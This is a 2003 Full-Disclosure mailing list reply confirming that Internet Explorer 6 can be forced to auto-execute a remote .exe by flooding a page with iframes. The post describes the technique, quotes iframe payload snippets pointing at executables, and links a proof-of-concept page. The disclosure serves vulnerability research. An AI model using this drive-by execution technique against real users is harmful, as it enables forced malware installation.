[Full-Disclosure] Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! - UPDATED

• Previous message: Richard M. Smith: "[Full-Disclosure] An expired domain name equals identity theft via email"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <full-disclosure@lists.netsys.com>
Date: Thu, 15 May 2003 21:06:39 -0000

Marek,

Further to my confirmation of seeing this in the past as detailed
below, I am today delighted to inform you that I can reconfirm that
it functions precisely as you describe:

1. Definitely processor related as after 10 minutes of bogging down
the machine, BANG ! it automatically opened the .exe

2. Thereon after, all following .exe's are also automatically opened

Tested on the following page which is nothing more than a sh!tload of:
 
<iframe src="fooware.exe">'s

Harmless .exe

http://www.malware.com/forceframe.html

Note: may of course be different on other machines [i.e. processor
power...increase amount of frame 'suppose]

Well Done ! It's a beauty !

======
I had sent this to bugtraq when you initially posted it, confirming
having seen it in the past as well. Will try your html file and see
if can get it up and running again.

Forwarded From: "http-equiv@excite.com"

> <!--
>
> I've noticed that on my test environment it is possible to bypass
> InternetExplorer Zones protection by flooding it with large number
of
> file://requests in example to infected fileserver. The result of
this
> bypass isEXECUTION OF ANY REQUESTED FILE. My requested file
> was 'trojan.exe' placedon neighbour WIN2K Professional workstation.
> To see code used during the test check files in attached archive.
>
> On IE 6.0 the result was always the same, after more than 200
dialog
> boxes with 'trojan.exe' request, suddenly requested file got
executed
>
> -->
>
> Excellent. Can confirm seeing this happen twice in the past two
> years. Both in Internet Explorer and Outlook Express, using an
iframe
> and a remote executable on the server e.g. <iframe
> src="http://...../malware.exe"> multiple instances on one page. One
> slipped through and the file was executed automatically.
>
> Not been able to replicate since though.
>
> May be a combo machine power and 'confusing' IE [easier].
>
>
> --
> http://www.malware.com
>
>

-- 
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: Richard M. Smith: "[Full-Disclosure] An expired domain name equals identity theft via email"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [Full-Disclosure] Fwd: Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! [CRITICAL] ... > I've noticed that on my test environment it is possible to bypass ... > InternetExplorer Zones protection by flooding it with large number ... > bypass isEXECUTION OF ANY REQUESTED FILE. ... (Full-Disclosure) [Full-Disclosure] Fwd: Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! [CRITICAL] ... > I've noticed that on my test environment it is possible to bypass ... > InternetExplorer Zones protection by flooding it with large number ... > bypass isEXECUTION OF ANY REQUESTED FILE. ... (Full-Disclosure) Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! - UPDATED ... Further to my confirmation of seeing this in the past as detailed ... > bypass isEXECUTION OF ANY REQUESTED FILE. ... "Information Security and the Disappearing Perimeter" Join Peter S. Tippett, PhD, M.D., the industry's foremost authority on network security, and TruSecure for a free breakfast seminar on "The Impact of the Disappearing Perimeter." ... (NT-Bugtraq) Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! - UPDATED ... Further to my confirmation of seeing this in the past as detailed ... > InternetExplorer Zones protection by flooding it with large number ... > bypass isEXECUTION OF ANY REQUESTED FILE. ... (Bugtraq)